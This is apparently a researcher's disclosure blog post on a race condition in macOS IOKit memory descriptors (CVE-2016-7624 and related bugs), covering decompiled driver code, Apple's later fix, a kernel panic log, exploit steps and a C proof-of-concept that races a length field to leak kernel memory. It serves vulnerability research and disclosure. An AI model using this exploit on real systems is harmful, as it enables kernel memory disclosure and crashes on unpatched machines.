This blog post is about a new type of vulnerabilities in IOKit I discovered and submitted to Apple in 2016. I did a brief scan using a IDA script on MacOS and found at least four bugs with 3 CVEs assigned (CVE-2016-7620/4/5), see https://support.apple.com/kb/HT207423. I was told afterwards that there’re even more issues of this type on iOS’/OSX’s IOKit drivers and fortunately Apple fixed them also.



Lecture time: IOKit revisited

Recall the old userspace iokit call entry method:

1709 kern_return_t 1710 IOConnectCallMethod( 1711 mach_port_t connection, // In 1712 uint32_t selector, // In 1713 const uint64_t *input, // In 1714 uint32_t inputCnt, // In 1715 const void *inputStruct, // In 1716 size_t inputStructCnt, // In 1717 uint64_t *output, // Out 1718 uint32_t *outputCnt, // In/Out 1719 void *outputStruct, // Out 1720 size_t *outputStructCntP) // In/Out 1721 { //... 1736 if (inputStructCnt <= sizeof(io_struct_inband_t)) { 1737 inb_input = (void *) inputStruct; 1738 inb_input_size = (mach_msg_type_number_t) inputStructCnt; 1739 } 1740 else { 1741 ool_input = reinterpret_cast_mach_vm_address_t(inputStruct); 1742 ool_input_size = inputStructCnt; 1743 } 1744 //... 1770 else if (size <= sizeof(io_struct_inband_t)) { 1771 inb_output = outputStruct; 1772 inb_output_size = (mach_msg_type_number_t) size; 1773 } 1774 else { 1775 ool_output = reinterpret_cast_mach_vm_address_t(outputStruct); 1776 ool_output_size = (mach_vm_size_t) size; 1777 } 1778 } 1779 1780 rtn = io_connect_method(connection, selector, 1781 (uint64_t *) input, inputCnt, 1782 inb_input, inb_input_size, 1783 ool_input, ool_input_size, 1784 inb_output, &inb_output_size, 1785 output, outputCnt, 1786 ool_output, &ool_output_size); 1787 //... 1795 return rtn; 1796 }

If the inputstruct is larger than sizeof(io_struct_inband_t) , the passed in argument will be casted to a mach_vm_address_t , otherwise just a native pointer.

Is this one race-able? No? Is that one race-able?

For a curious mind one would like to ask, if there exists any possibility that this can be modified to lead to TOCOU? Historical vulnerabilities focuses on racing memories shared via IOConnectMapMemory, whose meaning is very obvious according to this name (see Pangu’s and Ian Beer‘s ) research), however these kinds of vulns are mostly eliminated now.

Eyes turned to these simple and naive IOKit arguments, are these benign little spirits even race-able?

Lets see how these arguments are passed from userspace to kernel space.

In MIG trap defs and generated code, different input types are dealt in different ways.

601 602routine io_connect_method( 603 connection : io_connect_t; 604 in selector : uint32_t; 605 606 in scalar_input : io_scalar_inband64_t; 607 in inband_input : io_struct_inband_t; 608 in ool_input : mach_vm_address_t; 609 in ool_input_size : mach_vm_size_t; 610 611 out inband_output : io_struct_inband_t, CountInOut; 612 out scalar_output : io_scalar_inband64_t, CountInOut; 613 in ool_output : mach_vm_address_t; 614 inout ool_output_size : mach_vm_size_t 615 ); 616

The following code is generated:

/* Routine io_connect_method */ mig_external kern_return_t io_connect_method ( mach_port_t connection, uint32_t selector, io_scalar_inband64_t scalar_input, mach_msg_type_number_t scalar_inputCnt, io_struct_inband_t inband_input, mach_msg_type_number_t inband_inputCnt, mach_vm_address_t ool_input, mach_vm_size_t ool_input_size, io_struct_inband_t inband_output, mach_msg_type_number_t *inband_outputCnt, io_scalar_inband64_t scalar_output, mach_msg_type_number_t *scalar_outputCnt, mach_vm_address_t ool_output, mach_vm_size_t *ool_output_size ) { //... (void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt); //... if (inband_inputCnt > 4096) { { return MIG_ARRAY_TOO_LARGE; } } (void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt); //... InP->ool_input = ool_input; InP->ool_input_size = ool_input_size;

OK, seems scala-input and struct-input with size < 4096 are copied and bundled inband of the mach-msg, then passed into kernel space. No way.

However, Struct-input with size > 4096 remains mach_vm_address and is untouched.

Now lets dive into kernel space

3701 kern_return_t is_io_connect_method 3702 ( 3703 io_connect_t connection, 3704 uint32_t selector, 3705 io_scalar_inband64_t scalar_input, 3706 mach_msg_type_number_t scalar_inputCnt, 3707 io_struct_inband_t inband_input, 3708 mach_msg_type_number_t inband_inputCnt, 3709 mach_vm_address_t ool_input, 3710 mach_vm_size_t ool_input_size, 3711 io_struct_inband_t inband_output, 3712 mach_msg_type_number_t *inband_outputCnt, 3713 io_scalar_inband64_t scalar_output, 3714 mach_msg_type_number_t *scalar_outputCnt, 3715 mach_vm_address_t ool_output, 3716 mach_vm_size_t *ool_output_size 3717 ) 3718 { 3719 CHECK( IOUserClient, connection, client ); 3720 3721 IOExternalMethodArguments args; 3722 IOReturn ret; 3723 IOMemoryDescriptor * inputMD = 0; 3724 IOMemoryDescriptor * outputMD = 0; 3725 //... 3736 args.scalarInput = scalar_input; 3737 args.scalarInputCount = scalar_inputCnt; 3738 args.structureInput = inband_input; 3739 args.structureInputSize = inband_inputCnt; 3740 3741 if (ool_input) 3742 inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size, 3743 kIODirectionOut, current_task()); 3744 3745 args.structureInputDescriptor = inputMD; //... 3753 if (ool_output && ool_output_size) 3754 { 3755 outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size, 3756 kIODirectionIn, current_task()); //... 3774 return (ret); 3775 }

Seems Apple and Linus take a different approach here. In Linux kernel, usually incoming userspace content are copied to kernel-allocated memory content using copy_from_user . However here the Apple kernel directly creates a memory descriptor using the userspace address, rather than creating a copy.

So can we modify this memory content in userspace after it’s passed to kernel via IOKit call?

Surprisingly, the answer is yes!

This means, for a IOKit call, if the corresponding IOService accepts input memory descriptor, the userspace program can alter the content while the IOService is processing it, no lock, no write prevention. Juicy place for racing conditions and TOCTOUs(Time to check before time to use) :) After this bug is fixed I talked to security folks at Apple and they said even they didn’t realized the descriptor mapped memory is writable by userspace.

I quickly identified several potential vulnerable patterns in IOReportUserClient, IOCommandQueue and IOSurface, one of them (CVE-2016-7624) is described below. And there’re far more patterns than that, using your imagination :)

TOCTOU in IOCommandQueue can lead to information disclosure reachable from sandbox

There exists an TOCTOU in IOCommandQueue::submit_command_buffer. This function accepts either inband struct or structureInputDescriptor. Data controlled by attacker is passed into the function and at certain offset a value is used as length. The length is validated but due to the nature of MemoryDescriptor, client can still change the value when its actually used by modifying the mapped memory, causing TOCTOU that lead to information disclosure or other possible oob write.

Analysis

IOAccelCommandQueue::s_submit_command_buffers accept user input IOExternalMethodArguments, and if structureInputDescriptor is passed in from a userspace mapped address, it will use structureInputDescriptor and get a IOMemoryMap then get its address and use it. But nothing prevents userspace from modifying the content represented by the address, lead to TOCTOU.

__int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3) { IOExternalMethodArguments *v3; // r12@1 IOAccelCommandQueue *v4; // r15@1 unsigned __int64 inputdatalen; // rsi@1 unsigned int v6; // ebx@1 IOMemoryDescriptor *v7; // rdi@3 __int64 v8; // r14@3 __int64 inputdata; // rcx@5 v3 = a3; v4 = this; inputdatalen = (unsigned int)a3->structureInputSize; v6 = -536870206; if ( inputdatalen >= 8 && inputdatalen - 8 == 3 * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) ) { v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor; v8 = 0LL; if ( v7 ) { v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL); v6 = -536870200; if ( !v8 ) return v6; inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8); LODWORD(inputdatalen) = v3->structureInputSize; }

We can see that at offset+4, a DWORD is retrived as length and compared with ((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL)

And then this length offset is used again in submit_command_buffer. See the following code:

if ( *((_QWORD *)this + 160) ) { v5 = (IOAccelShared2 *)*((_QWORD *)this + 165); if ( v5 ) { IOAccelShared2::processResourceDirtyCommands(v5); IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2); if ( *(_DWORD *)(input + 4) ) { v6 = (unsigned __int64 *)(input + 24); v7 = 0LL; do { IOAccelCommandQueue::submitCommandBuffer( (IOAccelCommandQueue *)v2, *((_DWORD *)v6 - 4),//v6 based on input *((_DWORD *)v6 - 3),//based on input *(v6 - 1),//based on input *v6);//based on input ++v7; v6 += 3; } while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE }

Notice in line 23 that *(input+4) is accessed again as loop boundary. However if user passes in a descriptor, then he can modify it at userland and bypass the check in s_submit_command_buffers , cause the loop to go out-of-bound.

In IOAccelCommandQueue::submitCommandBuffer , in the following statement:

IOGraphicsAccelerator2::sendBlockFenceNotification( *((IOGraphicsAccelerator2 **)this + 166), (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL), data_from_input_add_24_minus_8, 0LL, v13); result = IOGraphicsAccelerator2::sendBlockFenceNotification( *((IOGraphicsAccelerator2 **)this + 166), (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL), data_from_input_add_24, 0LL, v13);

The memory content is sent back to user space if a notification callback is installed. So if an attacker can carefully control some sensitive memory to place after the mapped descriptor memory, the OOB can get this content back to userspace, lead to infoleak.

The exploit steps are

Userspace program mmaps memory page, pass it as iokit call argument structureInputDescriptor

s_submit_command_buffer validates at +4 the content is legal compared to the total incoming structureInput length

submit_command_buffer iterates the passed in descriptor memory from userspace, using the +4 as boundary length indicator. Memory content readed is calculated in submitCommandBuffer and send back to userspace via installed asyncNotificationPort.

Userspace program races to modify this +4 offset value, causing the loop to go out-of-bound, leaking adjacent memory in Kernel address space.

Notice that the inputdatelen is first retrieved from structureInputSize, so we cannot directly use the IOConnectCallMethod API. Because in this API, structureInput and structureInputDescriptor cannot be passed at same time.

Instead we directly call _io_connect_method private function in IOKit framework, which accepts structureInput and structureInputDescriptor at same time.

POC code

POC code for these three vulns can all be found at https://github.com/flankerhqd/descriptor-describes-racing. Here is one simplified version:

volatile unsigned int secs = 10; void modifystrcut() { *((unsigned int*)(input+4)) = 0x7fffffff; printf("secs %x

", secs); } //... int main(int argc, const char * argv[]) { io_iterator_t iterator; //... getFunc(); io_connect_t conn; io_service_t svc; //... IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator); svc = IOIteratorNext(iterator); printf("%x %x

", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn); //... io_connect_t sharedconn; IOServiceOpen(svc, mach_task_self(), 6, &sharedconn); IOConnectAddClient(conn, sharedconn); //then set async ref ref = IONotificationPortCreate(kIOMasterPortDefault); port = IONotificationPortGetMachPort(ref); pthread_t rt; pthread_create(&rt, NULL, gaorunloop, NULL); io_async_ref64_t asyncRef; asyncRef[kIOAsyncCalloutFuncIndex] = callback; asyncRef[kIOAsyncCalloutRefconIndex] = NULL; //... const uint32_t outputcnt = 0; const size_t outputcnt64 = 0; IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt); //... size_t i=0; input = dommap(); { char* structinput = input; *((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor? size_t outcnt = 0; } //... const size_t bufsize = 4088; char buf[bufsize]; memset(buf, 'a', sizeof(buf)*bufsize); size_t outcnt =0; *((unsigned int*)(buf+4)) = 0xaa; //... { pthread_t t; pthread_create(&t, NULL, modifystrcut, NULL); //... io_connect_method( conn, 1, NULL,//input 0,//inputCnt buf,//inb_input bufsize,//inb_input_size reinterpret_cast_mach_vm_address_t(input),//ool_input ool_size,//ool_input_size buf,//inb_output (mach_msg_type_number_t*)&outputcnt, //inb_output_size* (uint64_t*)buf,//output &outputcnt, //outputCnt reinterpret_cast_mach_vm_address_t(buf), //ool_output (mach_msg_type_number_t*)&outputcnt64//ool_output_size* ); }

Two key constans are 4088 and 0xaa, this two numbers will comfort the check at

inputdatalen - 8 == 3 * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )

and

if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen - 8) >> 64) >> 4) )

Panic Report

panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers: CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0 RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000 RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80 R8: 0x00000000ffffffff, R9: 0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fff R12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aa RFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS: 0x0000000000000008, SS: 0x0000000000000010 Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0 Backtrace (CPU 0), Frame : Return Address 0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe2 0xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a 0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe3 0xffffff81276d3a70 : 0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e 0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba 0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x19 0xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e7 0xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd0 0xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x103 0xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb8 0xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5 0xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a 0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16 Kernel Extensions in backtrace: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000 dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000 com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000 dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000 dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000 dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000 BSD process name corresponding to current thread: cmdqueue1 Boot args: keepsyms=1 -v Mac OS version: 15F34 Kernel version: Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64 Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6 Kernel slide: 0x000000001dc00000 Kernel text base: 0xffffff801de00000 __HIB text base: 0xffffff801dd00000 System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5)

Disassembling the RIP register

__text:000000000002929E mov esi, [rbx-10h] ; unsigned int __text:00000000000292A1 mov edx, [rbx-0Ch] ; unsigned int __text:00000000000292A4 mov rcx, [rbx-8] ; unsigned __int64 __text:00000000000292A8 mov r8, [rbx] ; unsigned __int64

We can see at the crash address, rbx has already go out-of-bound, hits an adjacent unmapped area, lead to crash.

Tested on 10.11.5 Macbook Airs, Macbook Pros with command line

while true; do ./cmdqueue1 ; done

Fix for these issues

The sources for XNU in 10.11.2 haven’t been released, but let’s have a look at disassembled kernel.

Originally, we have these lines when creating a descriptor:

3741 if (ool_input) 3742 inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size, 3743 kIODirectionOut, current_task());

Proved by dissembling unpatched kernel:

mov rax, gs:8 mov rcx, [rax+308h] ; unsigned int mov edx, 2 ; unsigned __int64 mov rsi, [rbp+arg_8] ; unsigned __int64 call __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *) mov r15, rax

While on the 10.11.2, the corresponding snippet in _is_io_connect_method changed to:

mov rax, gs:8 mov rcx, [rax+318h] ; unsigned int mov edx, 20002h ; unsigned __int64 mov rsi, [rbp+arg_8] ; unsigned __int64 call __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *) mov r15, rax

A new flag (0x20000) is introduced to IOMemoryDescriptor::withAddressRange. The flag is later checked in IOGeneralMemoryDescriptor::memoryReferenceCreate, as shown in a diaphora diff on IOMemoryDescriptor’s functions.

if ( this->_task && !err && this->baseclass_0._flags & 0x20000 && !(optionsa & 4) ) //newly added source err = IOGeneralMemoryDescriptor::memoryReferenceCreate(this, optionsa | 4, &ref->mapRef);

And is then checked at the beginning of this function

prot = 1; cacheMode = (this->baseclass_0._flags & 0x70000000) >> 28; v4 = vmProtForCacheMode(cacheMode); prot |= v4; if ( cacheMode ) prot |= 2u; if ( 2 != (this->baseclass_0._flags & 3) ) prot |= 2u; if ( optionsa & 2 ) prot |= 2u; if ( optionsa & 4 ) prot |= 0x200000u;

prot is used at in mach_make_memory_entry_64 , describing the permission of this mapping. 0x200000 is actually MAP_MEM_VM_COPY

382 /* leave room for vm_prot bits */ 383 #define MAP_MEM_ONLY 0x010000 /* change processor caching */ 384 #define MAP_MEM_NAMED_CREATE 0x020000 /* create extant object */ 385 #define MAP_MEM_PURGABLE 0x040000 /* create a purgable VM object */ 386 #define MAP_MEM_NAMED_REUSE 0x080000 /* reuse provided entry if identical */ 387 #define MAP_MEM_USE_DATA_ADDR 0x100000 /* preserve address of data, rather than base of page */ 388 #define MAP_MEM_VM_COPY 0x200000 /* make a copy of a VM range */ 389 #define MAP_MEM_VM_SHARE 0x400000 /* extract a VM range for remap */ 390 #define MAP_MEM_4K_DATA_ADDR 0x800000 /* preserve 4K aligned address of data */ 391

Which means now descriptors passed in via IOKit has a memory entry of possibly COW, preventing userspace from modifying it in 10.12.2 and iOS 10.2. Rather than fixing driver issues one by one, Apple seems to have done a good job by patching the entry.

Credits

Credit also goes to Liang Chen of KeenLab for also contributing to this research. Also kudos to Apple security team for responding and fixing these issues.